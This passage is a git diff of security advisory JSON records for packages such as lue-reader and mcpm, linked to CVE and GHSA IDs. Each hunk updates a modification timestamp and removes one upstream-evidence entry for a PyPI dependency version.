[ "GHSA-mq44-7p77-q5h7", "CVE-2026-59881", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-69243.json b/advisories/BREW-lue-reader-CVE-2026-69243.json index 5ac8cfd2a8..c40daf8a8c 100644 --- a/advisories/BREW-lue-reader-CVE-2026-69243.json +++ b/advisories/BREW-lue-reader-CVE-2026-69243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-69243", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mfx4-hv73-q22v", "CVE-2026-69243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-69244.json b/advisories/BREW-lue-reader-CVE-2026-69244.json index c120966301..c3f35a1285 100644 --- a/advisories/BREW-lue-reader-CVE-2026-69244.json +++ b/advisories/BREW-lue-reader-CVE-2026-69244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-69244", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-cq5v-8q36-5273", "CVE-2026-69244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-4571.json b/advisories/BREW-mcpm-CVE-2012-4571.json index d8f99a01cb..38d5c98b17 100644 --- a/advisories/BREW-mcpm-CVE-2012-4571.json +++ b/advisories/BREW-mcpm-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-4571", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-5577.json b/advisories/BREW-mcpm-CVE-2012-5577.json index e9e19a2f95..63504b056e 100644 --- a/advisories/BREW-mcpm-CVE-2012-5577.json +++ b/advisories/BREW-mcpm-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-5577", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2012-5578.json b/advisories/BREW-mcpm-CVE-2012-5578.json index 63980a0daf..32307b6e86 100644 --- a/advisories/BREW-mcpm-CVE-2012-5578.json +++ b/advisories/BREW-mcpm-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2012-5578", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2014-1829.json b/advisories/BREW-mcpm-CVE-2014-1829.json index d5932a9863..3a8dc4b0df 100644 --- a/advisories/BREW-mcpm-CVE-2014-1829.json +++ b/advisories/BREW-mcpm-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2014-1829", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2014-1830.json b/advisories/BREW-mcpm-CVE-2014-1830.json index 79623ead04..4e31212dd7 100644 --- a/advisories/BREW-mcpm-CVE-2014-1830.json +++ b/advisories/BREW-mcpm-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2014-1830", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2015-2296.json b/advisories/BREW-mcpm-CVE-2015-2296.json index 9c5bf579b2..f7d57d89c6 100644 --- a/advisories/BREW-mcpm-CVE-2015-2296.json +++ b/advisories/BREW-mcpm-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2015-2296", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2015-8557.json b/advisories/BREW-mcpm-CVE-2015-8557.json index ed8c0b59e4..b3285ac506 100644 --- a/advisories/BREW-mcpm-CVE-2015-8557.json +++ b/advisories/BREW-mcpm-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2015-8557", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2016-10516.json b/advisories/BREW-mcpm-CVE-2016-10516.json index d7045d1266..59af65a9c6 100644 --- a/advisories/BREW-mcpm-CVE-2016-10516.json +++ b/advisories/BREW-mcpm-CVE-2016-10516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2016-10516", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-h2fp-xgx6-xh6f", "CVE-2016-10516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2016-9015.json b/advisories/BREW-mcpm-CVE-2016-9015.json index 955319de20..11135313ba 100644 --- a/advisories/BREW-mcpm-CVE-2016-9015.json +++ b/advisories/BREW-mcpm-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2016-9015", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2017-11424.json b/advisories/BREW-mcpm-CVE-2017-11424.json index 20890cc690..ad10d86a60 100644 --- a/advisories/BREW-mcpm-CVE-2017-11424.json +++ b/advisories/BREW-mcpm-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2017-11424", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2017-18342.json b/advisories/BREW-mcpm-CVE-2017-18342.json index 33a9238221..c1c810c031 100644 --- a/advisories/BREW-mcpm-CVE-2017-18342.json +++ b/advisories/BREW-mcpm-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2017-18342", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-1000518.json b/advisories/BREW-mcpm-CVE-2018-1000518.json index 3b5e35d376..52b973db97 100644 --- a/advisories/BREW-mcpm-CVE-2018-1000518.json +++ b/advisories/BREW-mcpm-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-1000518", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-18074.json b/advisories/BREW-mcpm-CVE-2018-18074.json index 704b0ce4f4..f1b1136161 100644 --- a/advisories/BREW-mcpm-CVE-2018-18074.json +++ b/advisories/BREW-mcpm-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-18074", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-20060.json b/advisories/BREW-mcpm-CVE-2018-20060.json index c3fcc75c9c..55185b5ec3 100644 --- a/advisories/BREW-mcpm-CVE-2018-20060.json +++ b/advisories/BREW-mcpm-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-20060", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2018-25091.json b/advisories/BREW-mcpm-CVE-2018-25091.json index 21c507c3c1..e3e61ae9ff 100644 --- a/advisories/BREW-mcpm-CVE-2018-25091.json +++ b/advisories/BREW-mcpm-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2018-25091", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-11236.json b/advisories/BREW-mcpm-CVE-2019-11236.json index b56806004f..d335e0577a 100644 --- a/advisories/BREW-mcpm-CVE-2019-11236.json +++ b/advisories/BREW-mcpm-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-11236", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-11324.json b/advisories/BREW-mcpm-CVE-2019-11324.json index cd6d83a95f..1684847e78 100644 --- a/advisories/BREW-mcpm-CVE-2019-11324.json +++ b/advisories/BREW-mcpm-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-11324", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-14322.json b/advisories/BREW-mcpm-CVE-2019-14322.json index 01f088e6ab..270b747751 100644 --- a/advisories/BREW-mcpm-CVE-2019-14322.json +++ b/advisories/BREW-mcpm-CVE-2019-14322.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-14322", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j544-7q9p-6xp8", "CVE-2019-14322", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-14806.json b/advisories/BREW-mcpm-CVE-2019-14806.json index 5358ade6cc..3f35c5d0d9 100644 --- a/advisories/BREW-mcpm-CVE-2019-14806.json +++ b/advisories/BREW-mcpm-CVE-2019-14806.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-14806", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gq9m-qvpx-68hc", "CVE-2019-14806", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-18874.json b/advisories/BREW-mcpm-CVE-2019-18874.json index 70ee02dbb6..26c24bd6bf 100644 --- a/advisories/BREW-mcpm-CVE-2019-18874.json +++ b/advisories/BREW-mcpm-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-18874", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2019-20477.json b/advisories/BREW-mcpm-CVE-2019-20477.json index 15bf0a8f8b..8b11ed0b7d 100644 --- a/advisories/BREW-mcpm-CVE-2019-20477.json +++ b/advisories/BREW-mcpm-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2019-20477", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-14343.json b/advisories/BREW-mcpm-CVE-2020-14343.json index 84e527288b..81f50f040e 100644 --- a/advisories/BREW-mcpm-CVE-2020-14343.json +++ b/advisories/BREW-mcpm-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-14343", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-1747.json b/advisories/BREW-mcpm-CVE-2020-1747.json index 4648a93c87..a209f9b13d 100644 --- a/advisories/BREW-mcpm-CVE-2020-1747.json +++ b/advisories/BREW-mcpm-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-1747", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-26137.json b/advisories/BREW-mcpm-CVE-2020-26137.json index 10ee8671ce..8b550e3f41 100644 --- a/advisories/BREW-mcpm-CVE-2020-26137.json +++ b/advisories/BREW-mcpm-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-26137", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-28724.json b/advisories/BREW-mcpm-CVE-2020-28724.json index f1af9b23bb..ef6df81778 100644 --- a/advisories/BREW-mcpm-CVE-2020-28724.json +++ b/advisories/BREW-mcpm-CVE-2020-28724.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-28724", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3p3h-qghp-hvh2", "CVE-2020-28724", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7212.json b/advisories/BREW-mcpm-CVE-2020-7212.json index 3f1c169526..1cb16f745b 100644 --- a/advisories/BREW-mcpm-CVE-2020-7212.json +++ b/advisories/BREW-mcpm-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7212", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7694.json b/advisories/BREW-mcpm-CVE-2020-7694.json index 237a090335..0fc5667ae6 100644 --- a/advisories/BREW-mcpm-CVE-2020-7694.json +++ b/advisories/BREW-mcpm-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7694", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.49.0", - "key": "pkg:pypi/uvicorn@0.49.0", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2020-7695.json b/advisories/BREW-mcpm-CVE-2020-7695.json index 4d484ec0ac..ade0feff7e 100644 --- a/advisories/BREW-mcpm-CVE-2020-7695.json +++ b/advisories/BREW-mcpm-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2020-7695", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.49.0", - "key": "pkg:pypi/uvicorn@0.49.0", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-20270.json b/advisories/BREW-mcpm-CVE-2021-20270.json index 7cf4f7d451..a3fa7f2fad 100644 --- a/advisories/BREW-mcpm-CVE-2021-20270.json +++ b/advisories/BREW-mcpm-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-20270", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-27291.json b/advisories/BREW-mcpm-CVE-2021-27291.json index cbdc7ad252..71f78e9fb5 100644 --- a/advisories/BREW-mcpm-CVE-2021-27291.json +++ b/advisories/BREW-mcpm-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-27291", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-28363.json b/advisories/BREW-mcpm-CVE-2021-28363.json index e224c510a7..160d33b392 100644 --- a/advisories/BREW-mcpm-CVE-2021-28363.json +++ b/advisories/BREW-mcpm-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-28363", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-33503.json b/advisories/BREW-mcpm-CVE-2021-33503.json index 7b42cbeee9..40983857c5 100644 --- a/advisories/BREW-mcpm-CVE-2021-33503.json +++ b/advisories/BREW-mcpm-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-33503", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - 